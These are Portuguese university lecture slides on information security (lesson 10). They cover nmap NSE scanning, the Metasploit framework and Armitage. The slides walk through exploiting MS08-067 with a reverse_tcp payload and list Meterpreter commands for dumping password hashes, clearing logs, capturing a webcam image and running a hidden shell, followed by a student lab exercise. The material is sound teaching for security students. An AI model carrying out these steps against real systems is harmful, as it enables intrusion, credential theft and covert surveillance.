Buscar

aula 10 fic seg 22_7a65855a3d6936c9dbd4fc423ee481f5

Prévia do material em texto

Segurança da Informação
Aula 10
Prof. Lucas
Exploração de falhas: exploits 
Ganho de Acesso
Quebra de senha
Exploração de falhas
Introdução
• Rápida revisão nmap
• Nmap scripting engine: NSE
• Quando implementado corretamente, o NSE permite que o nmap conclua uma série de tarefas, incluindo 
scanning de vulnerabilidades, descoberta avançada de rede, detecção de backdoors e, em alguns casos, 
até mesmo a realização de exploração de falhas
Introdução nmap nse
• NSE divide os scripts por categoria
• auth
• broadcast
• brute
• default
• discovery
• dos
• exploit
• external
• fuzzer
• intrusive
• malware
• safe
• version
• vuln 
https://nmap.org/book/nse-usage.html#nse-categories
Introdução
• NSE e seus scripts já estão incluídos no nmap
• Para chamar o NSE, use o argumento --script seguido do nome da categoria ou do script 
e o endereço IP
Exemplo
• Pode-se utilizar toda uma família ou categoria de scripts usando o formato --script 
nome_categoria
• nmap --script vuln 192.168.1.108
• O comando executa uma série de scripts que procura problemas conhecidos no sistema-alvo
• Tipicamente disponibiliza um resultado somente quando uma vulnerabilidade é descoberta
Outra ferramenta
• Nessus (http://www.tenable.com/products/nessus/select-your-operating-system )
http://www.tenable.com/products/nessus/select-your-operating-system
Exploração de falhas
• De modo simplificado, a exploração de falhas corresponde ao processo de obter o controle 
sobre um sistema
• Um exploit corresponde a uma maneira de passar por uma falha ou de desviar dos controles de 
segurança
• Um exploit é a concretização, conversão ou a transformação de uma vulnerabilidade em uma arma
• Resultado do scanning deve ser usado para ajudar a moldar, a focar e a direcionar os seus 
ataques
O que é necessário para promover um ataque?
Vulnerabilidade(s)
AcessoPayload
Metasploit
• Frameworks para exploits
• Estrutura formal para o desenvolvimento e o envio de exploits
• Código aberto
• Permite selecionar o alvo e escolher entre uma ampla variedade de payloads
• Payloads são intercambiáveis e não estão associados a um exploit específico
• Resposta à pergunta: “O que eu quero fazer agora que tenho o controle do equipamento?”
• Adição de novos usuários, abertura de backdoors e a instalação de novos softwares (mais populares)
Payload é relacionado a:
• Carga de efeito de um ataque que foi entregue a um alvo
Metasploit
• Metasploit é diferente de um scan de vulnerabilidades
• Metasploit: executar realmente uma exploração de falhas
• Scan: procuram e informam pontos fracos em potencial
Metasploit
• http://www.metasploit.com/ 
• Comandos
msfconsole
msfupdate
http://www.metasploit.com/
Metasploit
• Não é uma prática legal sair disparando exploits aleatoriamente contra uma alvo (na 
expectativa de algum funcionar)
• O ideal é efetuar uma correspondência entre as vulnerabilidades e os exploits
Realizando o ataque
• Descoberta as vulnerabilidades, procurar com o comando search qualquer exploit associado à 
descoberta
• msfconsole 
Realizando o ataque
• Rank
1. Manual (manual)
2. Low (baixo)
3. Average (médio)
4. Normal (normal)
5. Good (bom)
6. Great (ótimo)
7. Excellent (excelente)
• Quanto mais alto a classificação, maior será a chance de sucesso e menor a probabilidade de 
desestruturar o sistema-alvo
Realizando o ataque
• use exploit/windows/smb/ms08_067_netapi
Realizando o ataque
• show payloads (verificar payloads disponíveis)
Realizando o ataque
• set payload windows/vncinject/reverse_tcp
Realizando o ataque
• show options (configuração do payload)
Realizando o ataque
• Configurar as variáveis RHOST e LHOST (remoto e local)
exploit: iniciar
o ataque!
Realizando o ataque
Resumo
• msfconsole
• search <número do path ausente>
• use <nome e path do exploit>
• show payloads
• set payload <path do payload>
• show options
• set <nome da opção> <valor da opção>
• exploit 
Payload meterpreter
• Payload disponível no Metasploit que disponibiliza um shell de comandos que pode ser usado para interagir 
com os alvos
• Comandos
• cat
• download
• upload
• upload arquivo c:\\windows\\system32
• edit
• execute
• kill
• cd, ls, ps, shutdown, mkdir, pwd, ifconfig
• hashdump (*crak de senha remoto – testar este comando)
• clearev – limpa o log
• idletime – mostra quanto tempo a vítima está ociosa
• webcam_list – mostra a webcam (se disponível)
• webcam_snap –i 1 –v false
• lpwd – saber o diretório da origem (caso faça um upload ou download)
• lcd 
• execute –f cmd.exe –i –H 
https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/ 
https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/
Realizando o ataque meterpreter
Comando hashdump
Carregando um exploit
• Ache o exploit
• https://www.exploit-db.com/ 
• Salve dentro do diretório:
• /usr/share/metasploit-framework/modules/exploits
• OU
• /root/.msf4 (diretório para exploits pessoais – melhor organização)
https://www.exploit-db.com/
Metasploit + scan
• Excelente ferramenta baseado em GUI com ferramentas de scan+metasploit
• apt-get install armitage
• service postgresql start
• service metasploit start
• No kali, já vem instalado!
Armitage
Antes de executar o armitage, execute o seguinte comando: msfdb init 
(apenas uma vez)
Armitage
Armitage
Armitage
Armitage
Armitage
Exercícios
1-Realize o ataque no metasploit utilizando o payload meterpreter. Envie um print pelo moodle
	Segurança da Informação
	Exploração de falhas: exploits
	Introdução
	Introdução nmap nse
	Introdução (2)
	Exemplo (2)
	Outra ferramenta
	Exploração de falhas
	O que é necessário para promover um ataque?
	Metasploit
	Payload é relacionado a:
	Metasploit (2)
	Metasploit (3)
	Metasploit (4)
	Realizando o ataque
	Realizando o ataque (2)
	Realizando o ataque (3)
	Realizando o ataque (4)
	Realizando o ataque (5)
	Realizando o ataque (6)
	Realizando o ataque (7)
	Realizando o ataque (8)
	Resumo
	Payload meterpreter
	Realizando o ataque meterpreter
	Comando hashdump
	Carregando um exploit
	Slide 28
	Metasploit + scan
	Armitage
	Armitage (2)
	Armitage (3)
	Armitage (4)
	Armitage (5)
	Armitage (6)
	Exercícios

Continue navegando